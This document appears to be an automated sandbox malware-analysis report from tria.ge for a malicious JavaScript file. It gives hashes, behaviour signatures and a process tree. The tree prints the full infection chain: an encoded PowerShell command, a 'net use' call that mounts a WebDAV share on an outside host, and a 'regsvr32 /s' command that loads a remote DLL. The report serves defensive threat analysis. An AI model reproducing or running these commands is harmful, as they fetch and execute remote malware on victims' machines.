Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 23:19
Static task
static1
Behavioral task
behavioral1
Sample
28412446175773797.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
28412446175773797.js
Resource
win10v2004-20240709-en
General
-
Target
28412446175773797.js
-
Size
17KB
-
MD5
57c5d7de5b5011d3198004a4ec925d59
-
SHA1
a583be67a288f6662a597a4d09f2bc24e65e9834
-
SHA256
d104feca0a214478933a2ec999a56f0f9261952bfc3990c4bbeb36dbb0269e9b
-
SHA512
63273abe9c562cdf65b8269d8f631e4c4f6d95ba48cddc1e0c55b1a04675f84bbccb96bbb0b223ca7853702a1dc009539c9ba4953340a11cb015e3a2810e4bd3
-
SSDEEP
96:y4ChUnZNj9RSV5fW14btOTuMjdQKDvGjkLjdSV0PQ7SVuDCdQ4z1nwtkLjdSV0PZ:bChQr9F1QxaFDsitoSP
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3024 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3012 wrote to memory of 3024 3012 wscript.exe 31 PID 3012 wrote to memory of 3024 3012 wscript.exe 31 PID 3012 wrote to memory of 3024 3012 wscript.exe 31 PID 3024 wrote to memory of 2808 3024 powershell.exe 33 PID 3024 wrote to memory of 2808 3024 powershell.exe 33 PID 3024 wrote to memory of 2808 3024 powershell.exe 33 PID 3024 wrote to memory of 2664 3024 powershell.exe 34 PID 3024 wrote to memory of 2664 3024 powershell.exe 34 PID 3024 wrote to memory of 2664 3024 powershell.exe 34 PID 3024 wrote to memory of 2664 3024 powershell.exe 34 PID 3024 wrote to memory of 2664 3024 powershell.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28412446175773797.js1⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADEAMgA5ADkANgA2ADcAMAAzADIAMgA0ADEAMgAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2808
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\12996670322412.dll3⤵PID:2664
-
-